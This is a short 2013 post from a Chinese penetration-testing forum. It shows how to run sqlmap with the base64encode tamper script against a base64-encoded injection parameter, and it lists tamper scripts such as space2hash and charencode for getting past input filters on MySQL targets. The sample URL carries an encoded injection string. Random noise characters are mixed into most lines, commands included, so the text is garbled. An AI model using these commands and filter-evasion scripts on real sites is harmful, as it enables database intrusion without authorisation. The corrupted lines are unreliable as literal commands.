中国网络渗透测试联盟

标题: SQlMap Tamper注入Base64编码注入点 [打印本页]

作者: admin    时间: 2013-11-23 15:50
标题: SQlMap Tamper注入Base64编码注入点
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
! L/ Z' `% N5 r& \$ l' U0 H* ^& Z1 n! @$ v7 y# E, ^1 O5 P' s
sqlmap的tamper里有个base64encode.py" j2 K4 k" @, {1 j0 H
" x! i$ O  g- h8 I
使用如下; v4 O( C# C. o% G& `2 V' @

/ t7 D& }- s. Y6 F* C  hsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs8 R4 x( d2 G* [! ]- O

) r% e6 n- s2 i# o. B8 O3 j
! a5 G! j# ]! M4 p4 usqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
* T0 y' w2 q: U8 c, _: G6 J5 M2 K+ q7 \* U7 x- W4 }  L: t
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:) x4 m# p$ }2 w: L! B0 w/ i9 I

3 R2 L  m4 Z4 n) N. S+ U2 dspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入5 _4 z; I  s# z" [4 _
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
2 r! _5 f9 F  w  V! G; @# y首先确定目标数据库版本,然后选择相应的脚本。
0 A: y- n+ W) E9 p2 t: S1 ]-v 3 --batch --tamper "space2hash.py"
' I4 v' I7 f; V1 k1 X' G' v9 M( N1 D) V# H
还有其他一些插件:- ^, Z/ r2 x* E; d* B) j
encodes编码 ——charencode.py" d, B8 _' {# e" p6 Q. ~
base64编码 —— base64encode.py
# H2 C4 u9 u- Y' M! [* e+ R替换空格和关键字 —— halfversionedmorekeywords.py
& p& g0 J: O4 P6 Z% X

+ I. y* i! c5 C9 v, z1 M! J5 P% Q3 {/ F7 {+ d. e

8 d0 Q' y. X* }5 v9 }& W% N! M: X# D8 t/ I( \: p- c: A! A& z5 G( _





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2